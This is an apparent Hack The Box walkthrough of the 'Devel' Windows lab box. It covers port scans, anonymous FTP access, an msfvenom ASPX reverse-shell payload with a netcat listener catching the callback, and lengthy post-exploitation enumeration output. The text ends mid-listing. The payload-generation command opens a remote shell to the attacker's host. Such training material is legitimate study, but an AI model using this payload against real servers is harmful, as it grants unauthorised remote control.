Hack The Box - Devel

Box Details

Devel

OS DIFFICULTY POINTS
Windows EASY 20

ENUMERATION

Inital Port Scanning

masscan

COMMAND


masscan -p1-65535,U:1-65535 10.10.10.5 --rate=1000 -e tun0 -oG masscan-Blue

RESULT


# Masscan 1.0.5 scan initiated Tue Sep 10 14:08:54 2019
# Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.5 ()     Ports: 80/open/tcp////
Host: 10.10.10.5 ()     Ports: 21/open/tcp////
# Masscan done at Tue Sep 10 14:12:36 2019

nmap

Ports for nmap scanning:

  • 80
  • 21

COMMAND


nmap -sC -sV -p80,21 -oA nmap-Devel 10.10.10.5

RESULT

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 15:13 BST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds

Discovery

FTP

COMMAND


ftp 10.10.10..5

RESULT

Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp> 

EXPLOITS

Exploit Search

COMMAND

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=8515 -f aspx > revshell.aspx

NOTE: As we are going to use netcat to listen for the reverse shell we must use the the payload windows/shell_reverse_tcp and not windows/shell/reverse_tcp; i.e. a stageless version.
RESULT


#  nc -lvvp 8515
listening on [any] 8515 ...
10.10.10.5: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.5] 49166
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

POST EXPLOIT DISCOVERY

System Information


c:\windows\system32\inetsrv>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 
System Boot Time:          13/9/2019, 5:50:51 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 804 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.542 MB
Virtual Memory: In Use:    505 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5


Hostname

c:\windows\system32\inetsrv>hostname
hostname
devel

Users

c:\windows\system32\inetsrv>echo %username%
echo %username%
DEVEL$

c:\windows\system32\inetsrv>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babis                    Guest                    
The command completed with one or more errors.

Network Information


c:\windows\system32\inetsrv>ipconfig /all

ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : devel
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-C8-4B
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.10.5(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
   DNS Servers . . . . . . . . . . . : 10.10.10.2
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{024DBC4C-1BA9-4DFC-8341-2C35AB1DF869}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
c:\windows\system32\inetsrv>route print
route print
===========================================================================
Interface List
 11...00 50 56 b9 c8 4b ......Intel(R) PRO/1000 MT Network Connection
  1...........................Software Loopback Interface 1
 12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
 13...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0       10.10.10.2       10.10.10.5    266
       10.10.10.0    255.255.255.0         On-link        10.10.10.5    266
       10.10.10.5  255.255.255.255         On-link        10.10.10.5    266
     10.10.10.255  255.255.255.255         On-link        10.10.10.5    266
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link        10.10.10.5    266
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link        10.10.10.5    266
===========================================================================
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0       10.10.10.2  Default
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    306 ::1/128                  On-link
  1    306 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None

c:\windows\system32\inetsrv>arp -A
arp -A

Interface: 10.10.10.5 --- 0xb
  Internet Address      Physical Address      Type
  10.10.10.2            00-50-56-b9-c8-cd     dynamic
  10.10.10.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static

c:\windows\system32\inetsrv>netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1424
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       384
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       724
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       488
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       496
  TCP    10.10.10.5:139         0.0.0.0:0              LISTENING       4
  TCP    10.10.10.5:49166       10.10.14.10:8515       ESTABLISHED     3228
  TCP    [::]:21                [::]:0                 LISTENING       1424
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       672
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5357              [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       384
  TCP    [::]:49153             [::]:0                 LISTENING       724
  TCP    [::]:49154             [::]:0                 LISTENING       888
  TCP    [::]:49155             [::]:0                 LISTENING       488
  TCP    [::]:49156             [::]:0                 LISTENING       496
  UDP    0.0.0.0:123            *:*                                    1000
  UDP    0.0.0.0:3702           *:*                                    1392
  UDP    0.0.0.0:3702           *:*                                    1392
  UDP    0.0.0.0:5355           *:*                                    1072
  UDP    0.0.0.0:52626          *:*                                    1392
  UDP    10.10.10.5:137         *:*                                    4
  UDP    10.10.10.5:138         *:*                                    4
  UDP    [::]:123               *:*                                    1000
  UDP    [::]:3702              *:*                                    1392
  UDP    [::]:3702              *:*                                    1392
  UDP    [::]:52627             *:*                                    1392

c:\windows\system32\inetsrv>netsh firewall show state
netsh firewall show state

Firewall status:
-------------------------------------------------------------------
Profile                           = Standard
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable
Group policy version              = Windows Firewall
Remote admin mode                 = Disable

Ports currently open on all network interfaces:
Port   Protocol  Version  Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .



c:\windows\system32\inetsrv> netsh firewall show config
 netsh firewall show config

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Domain profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          Network Discovery

Allowed programs configuration for Standard profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Standard profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Standard profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Log configuration:
-------------------------------------------------------------------
File location   = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size   = 4096 KB
Dropped packets = Disable
Connections     = Disable

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Investigate Running Services

c:\windows\system32\inetsrv>schtasks /query /fo LIST /v
schtasks /query /fo LIST /v

Folder: \
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           3:00:00
Start Date:                           9/11/2006
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual)
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job provides a credential prompt if authentication to the template distribution web service on the server fails.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Autochk
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Autochk\Proxy
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:21:07
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
Start In:                             N/A
Comment:                              This task collects and uploads autochk SQM data if opted-in to the Microsoft Customer Experience Improvement Program.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 525600 minutes
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Customer Experience Improvement Program
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\Consolidator
Next Run Time:                        14/9/2019 8:00:00
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 2:00:00
Last Result:                          -2147479295
Author:                               Microsoft Corporation
Task To Run:                          %SystemRoot%\System32\wsqmcons.exe
Start In:                             N/A
Comment:                              If the user has consented to participate in the Windows Customer Experience Improvement Program, this job collects and sends usage data to Microsoft.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           2/1/2004
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        19 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask
Next Run Time:                        19/9/2019 3:30:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The Kernel CEIP (Customer Experience Improvement Program) task collects additional information about the system and sends this data to Microsoft.  If the user has not consented to participate in Windows CEIP, this task does nothing.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 3 minutes, If Not Idle Retry For 1020 minutes
Power Management:                     No Start On Batteries
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           3:30:00
Start Date:                           1/9/2008
End Date:                             N/A
Days:                                 THU
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip
Next Run Time:                        16/9/2019 1:30:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The USB CEIP (Customer Experience Improvement Program) task collects Universal Serial Bus related statistics and information about your machine and sends it to the Windows Device Connectivity engineering group at Microsoft.  The information received is
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           1:30:00
Start Date:                           25/4/2008
End Date:                             N/A
Days:                                 Every 3 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Defrag
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Next Run Time:                        18/9/2019 1:38:42
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\defrag.exe -c
Start In:                             N/A
Comment:                              This task defragments the computers hard disk drives.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 3 minutes, If Not Idle Retry For 10080 minutes Stop the task if Idle State end
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2005
End Date:                             N/A
Days:                                 WED
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Diagnosis
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Diagnosis\Scheduled
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 5:45:40
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The Windows Scheduled Maintenance Task performs periodic maintenance of the computer system by fixing problems automatically or reporting them through the Action Center.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 480 minutes
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          INTERACTIVE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2004
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\DiskDiagnostic
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector
Next Run Time:                        22/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
Start In:                             N/A
Comment:                              The Windows Disk Diagnostic reports general disk and system information to Microsoft for users participating in the Customer Experience Program.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for  minutes, If Not Idle Retry For  minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2004
End Date:                             N/A
Days:                                 SUN
Months:                               Every 2 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\DFDWiz.exe
Start In:                             N/A
Comment:                              The Microsoft-Windows-DiskDiagnosticResolver warns users about faults reported by hard disks that support the Self Monitoring and Reporting Technology (S.M.A.R.T.) standard. This task is triggered automatically by the Diagnostic Policy Service when a S.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Location
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Location\Notifications
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %windir%\System32\LocationNotifications.exe
Start In:                             N/A
Comment:                              Location Activity
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Maintenance
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Maintenance\WinSAT
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 11:49:04
Last Result:                          0
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Measures a system's performance and capabilities
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for  minutes, If Not Idle Retry For  minutes Stop the task if Idle State end
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Administrators
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Media Center
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ActivateWindowsSearch
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoActivateWindowsSearch
Start In:                             N/A
Comment:                              Privileged Media Center Search Reindexing job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ConfigureInternetTimeService
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService
Start In:                             N/A
Comment:                              Privileged Media Center Time Update Service setting job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\DispatchRecoveryTasks
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Recovery Task Dispatcher job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ehDRMInit
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DRMInit
Start In:                             N/A
Comment:                              Privileged Media Center DRM initialization job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\InstallPlayReady
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center PlayReady install job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
